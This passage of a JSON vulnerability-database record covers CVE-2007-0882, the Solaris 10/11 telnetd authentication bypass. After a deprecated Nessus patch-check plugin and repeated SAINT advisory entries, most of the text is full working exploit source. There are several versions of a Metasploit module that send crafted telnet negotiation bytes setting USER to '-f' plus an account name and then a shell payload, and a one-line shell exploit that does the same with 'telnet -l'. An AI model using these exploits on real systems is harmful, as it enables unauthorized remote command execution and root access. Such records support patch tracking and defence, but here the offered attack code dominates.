associated patch is not\n# currently a recommended security fix.\n#\n# Disabled on 2011/09/17.\n\n#\n# (C) Tenable Network Security, Inc.\n#\n#\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(24343);\n script_version(\"1.26\");\n\n script_name(english: \"Solaris 10 (sparc) : 120068-03\");\n script_xref(name:\"IAVB\", value:\"2007-B-0006\");\n script_cve_id(\"CVE-2007-0882\");\n script_set_attribute(attribute: \"synopsis\", value:\n\"The remote host is missing Sun Security Patch number 120068-03\");\n script_set_attribute(attribute: \"description\", value:\n'SunOS 5.10: in.telnetd patch.\nDate this patch was last updated by Sun : Feb/21/07');\n script_set_attribute(attribute: \"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_attribute(attribute: \"see_also\", value:\n\"https://getupdates.oracle.com/readme/120068-03\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Solaris Telnet Remote Authentication Bypass Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2007/02/14\");\n script_cvs_date(\"Date: 2018/08/13 14:32:38\");\n script_set_attribute(attribute:\"patch_publication_date\", value: \"2007/02/13\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2007/02/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_summary(english: \"Check for patch 120068-03\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n family[\"english\"] = \"Solaris Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/Solaris/showrev\");\n exit(0);\n}\n\n\n\n# Deprecated.\nexit(0, \"The associated patch is not currently a recommended security fix.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2019-06-04T23:19:33", "bulletinFamily": "exploit", "description": "Added: 02/16/2007 \nCVE: [CVE-2007-0882](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882>) \nBID: [22512](<http://www.securityfocus.com/bid/22512>) \nOSVDB: [31881](<http://www.osvdb.org/31881>) \n\n\n### Background\n\nThe [Telnet](<http://en.wikipedia.org/wiki/Telnet>) service allows remote users to authenticate to a system and use an interactive command shell. The Telnet service is implemented by the Telnet daemon, `**telnetd**`. \n\n### Problem\n\nThe `**telnetd**` program in Solaris 10 and 11 misinterprets `**USER**` environment variables beginning with \"-f\", resulting in an authentication bypass vulnerability. A remote attacker could execute arbitrary commands using a standard telnet client program. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Alert 102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n\n### References\n\n<http://secunia.com/advisories/24120> \n<http://www.kb.cert.org/vuls/id/881872> \n\n\n### Limitations\n\nExploit works on Solaris 10 and 11. Root access can only be gained if the target system allows non-console superuser access. \n\n### Platforms\n\nSunOS \n \n\n", "modified": "2007-02-16T00:00:00", "published": "2007-02-16T00:00:00", "id": "SAINT:D7A17E0FAF80C87E6BDBCA024D9A13C0", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/solaris_telnetd_auth", "title": "Solaris telnetd authentication bypass", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:57", "bulletinFamily": "exploit", "description": "Added: 02/16/2007 \nCVE: [CVE-2007-0882](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882>) \nBID: [22512](<http://www.securityfocus.com/bid/22512>) \nOSVDB: [31881](<http://www.osvdb.org/31881>) \n\n\n### Background\n\nThe [Telnet](<http://en.wikipedia.org/wiki/Telnet>) service allows remote users to authenticate to a system and use an interactive command shell. The Telnet service is implemented by the Telnet daemon, `**telnetd**`. \n\n### Problem\n\nThe `**telnetd**` program in Solaris 10 and 11 misinterprets `**USER**` environment variables beginning with \"-f\", resulting in an authentication bypass vulnerability. A remote attacker could execute arbitrary commands using a standard telnet client program. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Alert 102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n\n### References\n\n<http://secunia.com/advisories/24120> \n<http://www.kb.cert.org/vuls/id/881872> \n\n\n### Limitations\n\nExploit works on Solaris 10 and 11. Root access can only be gained if the target system allows non-console superuser access. \n\n### Platforms\n\nSunOS \n \n\n", "modified": "2007-02-16T00:00:00", "published": "2007-02-16T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/solaris_telnetd_auth", "id": "SAINT:DA3D62A8F297274BAB795DE91F7D7F28", "type": "saint", "title": "Solaris telnetd authentication bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "description": "Added: 02/16/2007 \nCVE: [CVE-2007-0882](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0882>) \nBID: [22512](<http://www.securityfocus.com/bid/22512>) \nOSVDB: [31881](<http://www.osvdb.org/31881>) \n\n\n### Background\n\nThe [Telnet](<http://en.wikipedia.org/wiki/Telnet>) service allows remote users to authenticate to a system and use an interactive command shell. The Telnet service is implemented by the Telnet daemon, `**telnetd**`. \n\n### Problem\n\nThe `**telnetd**` program in Solaris 10 and 11 misinterprets `**USER**` environment variables beginning with \"-f\", resulting in an authentication bypass vulnerability. A remote attacker could execute arbitrary commands using a standard telnet client program. \n\n### Resolution\n\nApply one of the patches referenced in [Sun Alert 102802](<http://sunsolve.sun.com/search/document.do?assetkey=1-26-102802-1>). \n\n### References\n\n<http://secunia.com/advisories/24120> \n<http://www.kb.cert.org/vuls/id/881872> \n\n\n### Limitations\n\nExploit works on Solaris 10 and 11. Root access can only be gained if the target system allows non-console superuser access. \n\n### Platforms\n\nSunOS \n \n\n", "modified": "2007-02-16T00:00:00", "published": "2007-02-16T00:00:00", "id": "SAINT:F83AF66562E2301032ED9A730B8E80E0", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/solaris_telnetd_auth", "type": "saint", "title": "Solaris telnetd authentication bypass", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:43", "bulletinFamily": "exploit", "description": "", "modified": "2009-10-28T00:00:00", "published": "2009-10-28T00:00:00", "href": "https://packetstormsecurity.com/files/82328/Sun-Solaris-Telnet-Remote-Authentication-Bypass.html", "id": "PACKETSTORM:82328", "type": "packetstorm", "title": "Sun Solaris Telnet Remote Authentication Bypass", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability', \n'Description' => %q{ \nThis module exploits the argument injection vulnerabilty \nin the telnet daemon (in.telnetd) of Solaris 10 and 11. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2007-0882' ], \n[ 'OSVDB', '31881'], \n[ 'BID', '22512' ], \n], \n'Privileged' => false, \n'Platform' => ['unix', 'solaris'], \n'Arch' => ARCH_CMD, \n'Payload' => \n{ \n'Space' => 2000, \n'BadChars' => '', \n'DisableNops' => true, \n'Compat' => \n{ \n'PayloadType' => 'cmd', \n'RequiredCmd' => 'generic perl telnet', \n} \n}, \n'Targets' => \n[ \n['Automatic', { }], \n], \n'DisclosureDate' => 'Feb 12 2007', \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(23), \nOptString.new('USER', [ true, \"The username to use\", \"bin\" ]), \n], self.class) \nend \n \ndef exploit \nconnect \n \nprint_status('Setting USER environment variable...') \n \nreq = \"\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB\" \nreq << \"\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF\" \nreq << \"\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05\" \n \nsock.put(req) \nsock.get_once \n \nreq << \"\\xFF\\xFC\\x25\" \n \nsock.put(req) \nsock.get_once \n \nreq << \"\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0\" \n \nsock.put(req) \nsock.get_once \n \nreq << \"\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0\" \n \nsock.put(req) \nsock.get_once \n \nreq << \"\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24\" \n \nsock.put(req) \nsock.get_once \n \nreq = \"\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF\" \nreq << \"\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52\" \nreq << \"\\x01\\x2D\\x66\" + datastore['USER'] + \"\\xFF\\xF0\" \n \nsock.put(req) \nsock.get_once \nsleep(0.25) \n \nsock.put(payload.encoded + \"\\n\") \nsleep(0.25) \n \nhandler \nend \n \nend \n \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82328/fuser.rb.txt"}], "exploitdb": [{"lastseen": "2016-02-01T23:37:04", "bulletinFamily": "exploit", "description": "Sun Solaris Telnet Remote Authentication Bypass Vulnerability. CVE-2007-0882. Remote exploit for solaris platform", "modified": "2010-06-22T00:00:00", "published": "2010-06-22T00:00:00", "id": "EDB-ID:16328", "href": "https://www.exploit-db.com/exploits/16328/", "type": "exploitdb", "title": "Sun Solaris Telnet Remote Authentication Bypass Vulnerability", "sourceData": "##\r\n# $Id: fuser.rb 9583 2010-06-22 19:11:05Z todb $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = ExcellentRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits the argument injection vulnerabilty\r\n\t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9583 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0882' ],\r\n\t\t\t\t\t[ 'OSVDB', '31881'],\r\n\t\t\t\t\t[ 'BID', '22512' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 12 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(23),\r\n\t\t\t\t\tOptString.new('USER', [ true, \"The username to use\", \"bin\" ]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tprint_status('Setting USER environment variable...')\r\n\r\n\t\treq = \"\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB\"\r\n\t\treq << \"\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF\"\r\n\t\treq << \"\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFC\\x25\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq = \"\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF\"\r\n\t\treq << \"\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52\"\r\n\t\treq << \"\\x01\\x2D\\x66\" + datastore['USER'] + \"\\xFF\\xF0\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\tselect(nil,nil,nil,0.25)\r\n\r\n\t\tsock.put(\"nohup \" + payload.encoded + \" >/dev/null 2>&1\\n\")\r\n\r\n\t\tselect(nil,nil,nil,0.25)\r\n\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16328/"}, {"lastseen": "2016-02-01T11:31:41", "bulletinFamily": "exploit", "description": "Solaris 10, 11 Telnet Remote Authentication Bypass. CVE-2007-0882. Remote exploit for solaris platform", "modified": "2007-02-12T00:00:00", "published": "2007-02-12T00:00:00", "id": "EDB-ID:9918", "href": "https://www.exploit-db.com/exploits/9918/", "type": "exploitdb", "title": "Solaris 10 / 11 Telnet - Remote Authentication Bypass", "sourceData": "##\r\n# $Id$\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to \r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\t\r\n\t\t\t'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tThis module exploits the argument injection vulnerabilty\r\n\t\t\t\tin the telnet daemon (in.telnetd) of Solaris 10 and 11.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision$',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2007-0882' ],\r\n\t\t\t\t\t[ 'OSVDB', '31881'],\r\n\t\t\t\t\t[ 'BID', '22512' ],\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Platform' => ['unix', 'solaris'],\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 2000,\r\n\t\t\t\t\t'BadChars' => '',\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic perl telnet',\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Targets' => \r\n\t\t\t\t[\r\n\t\t\t\t\t['Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 12 2007',\r\n\t\t\t'DefaultTarget' => 0))\r\n\t\t\t\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOpt::RPORT(23),\r\n\t\t\t\t\tOptString.new('USER', [ true, \"The username to use\", \"bin\" ]),\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\t\t\t\r\n\t\tprint_status('Setting USER environment variable...')\r\n\t\t\r\n\t\treq = \"\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB\"\r\n\t\treq << \"\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF\"\r\n\t\treq << \"\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05\" \r\n\t\t\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\treq << \"\\xFF\\xFC\\x25\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\t\t\r\n\t\treq << \"\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0\"\t\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0\"\t\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq << \"\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\r\n\r\n\t\treq = \"\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF\"\r\n\t\treq << \"\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52\"\r\n\t\treq << \"\\x01\\x2D\\x66\" + datastore['USER'] + \"\\xFF\\xF0\"\r\n\r\n\t\tsock.put(req)\r\n\t\tsock.get_once\t\r\n\t\tsleep(0.25)\r\n\r\n\t\tsock.put(payload.encoded + \"\\n\")\r\n\t\tsleep(0.25)\t\r\n\t\r\n\t\thandler\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/9918/"}, {"lastseen": "2016-01-31T18:08:54", "bulletinFamily": "exploit", "description": "SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit. CVE-2007-0882. Remote exploit for solaris platform", "modified": "2007-02-11T00:00:00", "published": "2007-02-11T00:00:00", "id": "EDB-ID:3293", "href": "https://www.exploit-db.com/exploits/3293/", "type": "exploitdb", "title": "SunOS 5.10/5.11 in.telnetd Remote Authentication Bypass Exploit", "sourceData": "#!/bin/sh\r\n# CLASSIFIED CONFIDENTIAL SOURCE MATERIAL\r\n#\r\n# *********************ATTENTION********************************\r\n# THIS CODE _MUST NOT_ BE DISCLOSED TO ANY THIRD PARTIES\r\n# (C) COPYRIGHT Kingcope, 2007\r\n#\r\n################################################################\r\necho \"\"\r\necho \"SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope kingcope@gmx.net\"\r\nif [ $# -ne 2 ]; then\r\necho \"./sunos <host> <account>\"\r\necho \"./sunos localhost bin\"\r\nexit\r\nfi\r\necho \"\"\r\necho \"ALEX ALEX\"\r\necho \"\"\r\ntelnet -l\"-f$2\" $1\r\n\r\n# milw0rm.com [2007-02-11]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3293/"}], "metasploit": [{"lastseen": "2019-11-26T14:03:20", "bulletinFamily": "exploit", "description": "This module exploits the argument injection vulnerability in the telnet daemon (in.telnetd) of Solaris 10 and 11.\n", "modified": "2017-09-08T01:18:50", "published": "2007-02-17T13:52:50", "id": "MSF:EXPLOIT/SOLARIS/TELNET/FUSER", "href": "", "type": "metasploit", "title": "Sun Solaris Telnet Remote Authentication Bypass Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',\n 'Description' => %q{\n This module exploits the argument injection vulnerability\n in the telnet daemon (in.telnetd) of Solaris 10 and 11.\n },\n 'Author' => [ 'MC' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-0882' ],\n [ 'OSVDB', '31881'],\n [ 'BID', '22512' ],\n ],\n 'Privileged' => false,\n 'Platform' => %w{ solaris unix },\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'Space' => 2000,\n 'BadChars' => '',\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'generic perl telnet',\n }\n },\n 'Targets' =>\n [\n ['Automatic', { }],\n ],\n 'DisclosureDate' => 'Feb 12 2007',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(23),\n OptString.new('USER', [ true, \"The username to use\", \"bin\" ]),\n ])\n end\n\n def exploit\n connect\n\n print_status('Setting USER environment variable...')\n\n req = \"\\xFF\\xFD\\x26\\xFF\\xFB\\x26\\xFF\\xFD\\x03\\xFF\\xFB\"\n req << \"\\x18\\xFF\\xFB\\x1F\\xFF\\xFB\\x20\\xFF\\xFB\\x21\\xFF\"\n req << \"\\xFB\\x22\\xFF\\xFB\\x27\\xFF\\xFD\\x05\"\n\n sock.put(req)\n sock.get_once\n\n req << \"\\xFF\\xFC\\x25\"\n\n sock.put(req)\n sock.get_once\n\n req << \"\\xFF\\xFA\\x26\\x01\\x01\\x02\\xFF\\xF0\"\n\n sock.put(req)\n sock.get_once\n\n req << \"\\xFF\\xFA\\x1F\\x00\\x50\\x00\\x18\\xFF\\xF0\"\n\n sock.put(req)\n sock.get_once\n\n req << \"\\xFF\\xFE\\x26\\xFF\\xFC\\x23\\xFF\\xFC\\x24\"\n\n sock.put(req)\n sock.get_once\n\n req = \"\\xFF\\xFA\\x18\\x00\\x58\\x54\\x45\\x52\\x4D\\xFF\"\n req << \"\\xF0\\xFF\\xFA\\x27\\x00\\x00\\x55\\x53\\x45\\x52\"\n req << \"\\x01\\x2D\\x66\" + datastore['USER'] + \"\\xFF\\xF0\"\n\n sock.put(req)\n sock.get_once\n select(nil,nil,nil,0.25)\n\n sock.put(\"nohup \" + payload.encoded + \" >/dev/null 2>&1\\n\")\n\n select(nil,nil,nil,0.25)\n\n handler\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/solaris/telnet/fuser.rb"}]}
